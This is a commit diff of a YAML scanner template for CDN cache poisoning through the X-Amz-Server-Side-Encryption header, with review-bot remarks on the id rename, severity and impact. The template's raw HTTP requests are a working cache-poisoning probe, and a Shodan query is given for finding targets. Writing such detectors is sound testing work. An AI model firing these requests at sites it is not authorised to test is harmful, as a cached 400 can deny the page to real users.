misc updates
- Added random cache key + random header value + removed request condition as it's enabled as default
- Update severity from medium to unknown as impact is unclear.

patch-1
parent d189a2a70c
commit f1d37896b1
|
@ -1,34 +0,0 @@
|
||||||
id: cdn-cache-poisoning-aes256
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Misconfigured CDN Cache Poisoning via X-Amz-Server-Side-Encryption Header
|
|
||||||
author: 0xcharan
|
|
||||||
severity: medium
|
|
||||||
description: |
|
|
||||||
When the X-Amz-Server-Side-Encryption: AES256xss header is sent, it can lead to a misconfigured CDN cache response with a 400 status code, making the page inaccessible.
|
|
||||||
impact: |
|
|
||||||
This vulnerability can disrupt website availability by poisoning the CDN cache, potentially leading to denial of service for users trying to access the page.
|
|
||||||
reference:
|
|
||||||
- https://portswigger.net/web-security/web-cache-poisoning
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
shodan-query: "X-Amz-Server-Side-Encryption"
|
|
||||||
tags: cache,aws,poisoning,cdn
|
|
||||||
|
|
||||||
variables:
|
|
||||||
string: "{{to_lower(rand_base(5))}}"
|
|
||||||
|
|
||||||
requests:
|
|
||||||
- raw:
|
|
||||||
- |
|
|
||||||
GET /?cache={{string}} HTTP/1.1
|
|
||||||
X-Amz-Server-Side-Encryption: AES256xss
|
|
||||||
|
|
||||||
- |
|
|
||||||
GET /?cache={{string}} HTTP/1.1
|
|
||||||
|
|
||||||
req-condition: true
|
|
||||||
matchers:
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(body_2, "AES256xss") && status_code_2==400'
|
|
|
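Review bot: the template id changes from `cdn-cache-poisoning-aes256`, removed in this hunk, to `cdn-cache-poisoning` in the replacement file, and neither the commit title nor the message mentions the rename. Anyone who selects or excludes this template by id will silently stop matching it; call out the new id in the commit message, or keep the old id if the rename is not required.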
@ -0,0 +1,37 @@
|
||||||
|
id: cdn-cache-poisoning
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Misconfigured CDN Cache Poisoning via X-Amz-Server-Side-Encryption Header
|
||||||
|
author: 0xcharan
|
||||||
|
severity: unknown
|
||||||
|
description: |
|
||||||
|
When the X-Amz-Server-Side-Encryption header is sent with user controlled value, it can lead to a misconfigured CDN cache response with a 400 status code, making the page inaccessible.
|
||||||
|
impact: |
|
||||||
|
This vulnerability can disrupt website availability by poisoning the CDN cache, potentially leading to denial of service for users trying to access the page.
|
||||||
|
reference:
|
||||||
|
- https://portswigger.net/web-security/web-cache-poisoning
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: "X-Amz-Server-Side-Encryption"
|
||||||
|
tags: cache,aws,poisoning,cdn
|
||||||
|
|
||||||
|
variables:
|
||||||
|
string: "{{to_lower(rand_base(8))}}={{to_lower(rand_base(8))}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /?{{string}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
X-Amz-Server-Side-Encryption: {{randstr}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /?{{string}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(body_2, "{{randstr}}")'
|
||||||
|
- 'status_code_2==400'
|
||||||
|
condition: and
|
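Review bot: `severity: unknown` and the `impact:` text disagree: the commit message says the impact is unclear, yet the impact block still states that the poisoning leads to denial of service for users. Either reword the impact as conditional (it holds only when the cached 400 is served for a URL real users request) or keep a concrete severity. Related, on the two `GET /?{{string}}` requests: the random query string isolates the probe only when the CDN includes the query string in its cache key; where it does not, the first request can cache the 400 for `/` itself, so the description should state that limitation for anyone running the template against production. In the description, "user controlled" should be hyphenated.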